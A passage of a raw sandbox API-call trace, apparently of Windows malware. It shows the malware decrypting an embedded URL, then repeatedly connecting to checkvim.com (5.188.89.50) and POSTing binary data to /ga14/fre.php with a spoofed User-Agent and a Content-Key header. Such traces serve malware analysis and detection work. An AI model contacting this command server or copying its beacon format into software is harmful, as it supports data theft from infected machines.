GetProcessHeap () returned 0x840000 [0290.773] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0290.773] GetProcessHeap () returned 0x840000 [0290.773] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0290.773] send (s=0x490, buf=0x873a58*, len=237, flags=0) returned 237 [0290.773] send (s=0x490, buf=0x87eb58*, len=159, flags=0) returned 159 [0290.773] GetProcessHeap () returned 0x840000 [0290.773] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0290.773] recv (in: s=0x490, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0291.149] GetProcessHeap () returned 0x840000 [0291.149] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0291.149] GetProcessHeap () returned 0x840000 [0291.149] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0291.150] GetProcessHeap () returned 0x840000 [0291.150] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0291.150] GetProcessHeap () returned 0x840000 [0291.150] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0291.150] closesocket (s=0x490) returned 0 [0291.178] GetProcessHeap () returned 0x840000 [0291.178] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b18 | out: hHeap=0x840000) returned 1 [0291.179] GetProcessHeap () returned 0x840000 [0291.179] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0291.179] GetProcessHeap () returned 0x840000 [0291.179] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0291.179] GetProcessHeap () returned 0x840000 [0291.179] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0291.179] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x718) returned 0x490 [0291.180] Sleep (dwMilliseconds=0xea60) [0291.211] GetProcessHeap () returned 0x840000 [0291.211] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fcb0 [0291.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.212] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0291.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.219] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0291.226] GetProcessHeap () returned 0x840000 [0291.226] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0291.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.227] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e330) returned 1 [0291.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.228] CryptSetKeyParam (hKey=0x87e330, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0291.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.229] CryptSetKeyParam (hKey=0x87e330, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0291.229] GetProcessHeap () returned 0x840000 [0291.229] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0291.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.230] CryptDecrypt (in: hKey=0x87e330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fcb0, pdwDataLen=0x19f9a4 | out: pbData=0x87fcb0, pdwDataLen=0x19f9a4) returned 1 [0291.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.231] CryptDestroyKey (hKey=0x87e330) returned 1 [0291.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.232] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0291.232] GetProcessHeap () returned 0x840000 [0291.232] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0291.233] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0291.233] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0291.234] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0291.235] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0291.235] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0291.235] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0291.236] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0291.236] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0291.236] GetProcessHeap () returned 0x840000 [0291.237] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0291.237] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0291.237] GetProcessHeap () returned 0x840000 [0291.237] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0291.237] GetProcessHeap () returned 0x840000 [0291.237] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0291.237] GetProcessHeap () returned 0x840000 [0291.237] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcb0 | out: hHeap=0x840000) returned 1 [0291.237] GetProcessHeap () returned 0x840000 [0291.237] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0291.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.238] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0291.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.243] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0291.249] GetProcessHeap () returned 0x840000 [0291.249] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0291.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.250] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0291.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.251] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0291.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.252] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0291.252] GetProcessHeap () returned 0x840000 [0291.252] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0291.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.253] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0291.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.254] CryptDestroyKey (hKey=0x87e270) returned 1 [0291.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.255] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0291.255] GetProcessHeap () returned 0x840000 [0291.255] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0291.256] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0291.256] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0291.257] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0291.257] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0291.258] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0291.258] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0291.258] GetProcessHeap () returned 0x840000 [0291.258] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0291.258] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8714e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0291.260] GetProcessHeap () returned 0x840000 [0291.260] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c58 [0291.260] socket (af=2, type=1, protocol=6) returned 0x494 [0291.261] connect (s=0x494, name=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0291.335] FreeAddrInfoW (pAddrInfo=0x8714e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0291.335] GetProcessHeap () returned 0x840000 [0291.335] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f710 [0291.335] GetProcessHeap () returned 0x840000 [0291.335] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0291.336] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0291.337] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0291.337] GetProcessHeap () returned 0x840000 [0291.337] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0291.337] GetProcessHeap () returned 0x840000 [0291.338] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0291.338] GetProcessHeap () returned 0x840000 [0291.338] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb90 [0291.338] GetProcessHeap () returned 0x840000 [0291.338] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0291.338] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0291.339] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0291.339] GetProcessHeap () returned 0x840000 [0291.339] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0291.339] GetProcessHeap () returned 0x840000 [0291.340] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0291.340] send (s=0x494, buf=0x873a58*, len=237, flags=0) returned 237 [0291.340] send (s=0x494, buf=0x87eb58*, len=159, flags=0) returned 159 [0291.340] GetProcessHeap () returned 0x840000 [0291.340] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0291.340] recv (in: s=0x494, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0291.760] GetProcessHeap () returned 0x840000 [0291.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0291.760] GetProcessHeap () returned 0x840000 [0291.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb90 | out: hHeap=0x840000) returned 1 [0291.760] GetProcessHeap () returned 0x840000 [0291.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0291.760] GetProcessHeap () returned 0x840000 [0291.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f710 | out: hHeap=0x840000) returned 1 [0291.760] closesocket (s=0x494) returned 0 [0291.760] GetProcessHeap () returned 0x840000 [0291.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c58 | out: hHeap=0x840000) returned 1 [0291.760] GetProcessHeap () returned 0x840000 [0291.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0291.760] GetProcessHeap () returned 0x840000 [0291.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0291.760] GetProcessHeap () returned 0x840000 [0291.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0291.761] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x578) returned 0x494 [0291.762] Sleep (dwMilliseconds=0xea60) [0291.767] GetProcessHeap () returned 0x840000 [0291.767] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fdd0 [0291.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.768] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0291.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.774] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0291.780] GetProcessHeap () returned 0x840000 [0291.781] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0291.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.781] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e8f0) returned 1 [0291.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.783] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0291.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.784] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0291.784] GetProcessHeap () returned 0x840000 [0291.784] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0291.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.784] CryptDecrypt (in: hKey=0x87e8f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fdd0, pdwDataLen=0x19f9a4 | out: pbData=0x87fdd0, pdwDataLen=0x19f9a4) returned 1 [0291.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.785] CryptDestroyKey (hKey=0x87e8f0) returned 1 [0291.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.786] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0291.786] GetProcessHeap () returned 0x840000 [0291.786] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0291.787] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0291.787] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0291.788] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0291.788] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0291.789] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0291.789] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0291.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0291.790] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0291.790] GetProcessHeap () returned 0x840000 [0291.790] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0291.790] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0291.791] GetProcessHeap () returned 0x840000 [0291.791] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0291.791] GetProcessHeap () returned 0x840000 [0291.791] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0291.791] GetProcessHeap () returned 0x840000 [0291.791] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0291.791] GetProcessHeap () returned 0x840000 [0291.791] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f9e0 [0291.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.792] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0291.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.797] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0291.804] GetProcessHeap () returned 0x840000 [0291.804] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0291.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.805] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2b0) returned 1 [0291.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.806] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0291.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.807] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0291.807] GetProcessHeap () returned 0x840000 [0291.807] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0291.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.808] CryptDecrypt (in: hKey=0x87e2b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f9e0, pdwDataLen=0x19f9a4 | out: pbData=0x87f9e0, pdwDataLen=0x19f9a4) returned 1 [0291.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.809] CryptDestroyKey (hKey=0x87e2b0) returned 1 [0291.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0291.810] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0291.810] GetProcessHeap () returned 0x840000 [0291.810] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0291.810] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0291.811] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0291.811] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0291.812] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0291.812] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0291.813] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0291.813] GetProcessHeap () returned 0x840000 [0291.813] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0291.813] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0291.814] GetProcessHeap () returned 0x840000 [0291.814] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c98 [0291.814] socket (af=2, type=1, protocol=6) returned 0x498 [0291.814] connect (s=0x498, name=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0291.883] FreeAddrInfoW (pAddrInfo=0x871498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0291.883] GetProcessHeap () returned 0x840000 [0291.883] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0291.884] GetProcessHeap () returned 0x840000 [0291.884] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0291.884] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0291.885] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0291.885] GetProcessHeap () returned 0x840000 [0291.885] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0291.885] GetProcessHeap () returned 0x840000 [0291.885] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0291.885] GetProcessHeap () returned 0x840000 [0291.885] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fe18 [0291.885] GetProcessHeap () returned 0x840000 [0291.885] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0291.886] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0291.887] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0291.887] GetProcessHeap () returned 0x840000 [0291.887] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0291.887] GetProcessHeap () returned 0x840000 [0291.887] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0291.887] send (s=0x498, buf=0x873a58*, len=237, flags=0) returned 237 [0291.887] send (s=0x498, buf=0x87eb58*, len=159, flags=0) returned 159 [0291.887] GetProcessHeap () returned 0x840000 [0291.887] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0291.887] recv (in: s=0x498, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0292.270] GetProcessHeap () returned 0x840000 [0292.270] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0292.270] GetProcessHeap () returned 0x840000 [0292.270] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fe18 | out: hHeap=0x840000) returned 1 [0292.270] GetProcessHeap () returned 0x840000 [0292.271] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0292.271] GetProcessHeap () returned 0x840000 [0292.271] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0292.271] closesocket (s=0x498) returned 0 [0292.271] GetProcessHeap () returned 0x840000 [0292.271] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c98 | out: hHeap=0x840000) returned 1 [0292.271] GetProcessHeap () returned 0x840000 [0292.271] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0292.271] GetProcessHeap () returned 0x840000 [0292.271] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f9e0 | out: hHeap=0x840000) returned 1 [0292.271] GetProcessHeap 